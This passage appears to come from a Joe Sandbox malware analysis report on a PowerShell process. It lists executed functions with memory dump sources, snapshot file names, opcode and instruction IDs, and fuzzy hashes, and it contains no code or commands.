                                                  • Opcode ID: 1857017b76196d65de274a2bbdc300fd78a1d5d952eee9d2e3f176795f6aaf40
                                                  • Instruction ID: 5de22b0711c777537cbea8373653d45c8db7a12f7077b74b473a5d03839b83da
                                                  • Opcode Fuzzy Hash: 1857017b76196d65de274a2bbdc300fd78a1d5d952eee9d2e3f176795f6aaf40
                                                  • Instruction Fuzzy Hash: D7518197B0E6D2AEE752962C58F60E93FE0DF5722470901F7D5D4CA0939D0E680BE261

                                                  Executed Functions

                                                  Function 00007FFD3440091E Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.3047773295.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_7ffd34400000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wV4
                                                  • API String ID: 0-3082056132
                                                  • Opcode ID: 9f2c53d61c16fae49b7c17077b49f54744bc9371ce741eea6106f851cdbcfd09
                                                  • Instruction ID: 17fbee295316f1e512b53ed0a392fdd96dd2b68cb9b1b17c8db47716ead1f464
                                                  • Opcode Fuzzy Hash: 9f2c53d61c16fae49b7c17077b49f54744bc9371ce741eea6106f851cdbcfd09
                                                  • Instruction Fuzzy Hash: FBD10462A0E7C50FE766A76858B51B5BFE0EF57210B0A00FBD18DCB097D95CAC16D312
                                                  Function 00007FFD3440347A Relevance: .4, Instructions: 446COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.3047773295.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_7ffd34400000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e436fb9ed9d040686821b686ee89567245cafafa0c486e63f436503bdb990f8
                                                  • Instruction ID: 3bb222ee37ec510b3ca552a38ff905196755fbac46be85f8d2175e3bbaf3e5b1
                                                  • Opcode Fuzzy Hash: 6e436fb9ed9d040686821b686ee89567245cafafa0c486e63f436503bdb990f8
                                                  • Instruction Fuzzy Hash: 32D12362A0EA890FE7A5EB6888A95B5BFD0FF46350B0900FED14CCB1D7E95DAC15C341
                                                  Function 00007FFD344009EA Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.3047773295.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_7ffd34400000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3fe68396a8025474a3157a18aaecfd2de93d7291de87c376818f5abe0333b06
                                                  • Instruction ID: f9976f9b4349413cf2e39c76c2a56380ddb146a42d122d8b4f9e22d4b105f8fd
                                                  • Opcode Fuzzy Hash: d3fe68396a8025474a3157a18aaecfd2de93d7291de87c376818f5abe0333b06
                                                  • Instruction Fuzzy Hash: 00316C62F0EAC60FF7A5A76864F42B8A6C0EF62350B4A00BED54DC31D7DC9DAC15A701
                                                  Function 00007FFD34333A35 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.3047230702.00007FFD34330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_7ffd34330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                  • Instruction ID: 53acf32215bf2ef201cbe34e4b351086e0da9714b89895696e91b63a43b32ad1
                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10052DE58AC3661DA36E881CB42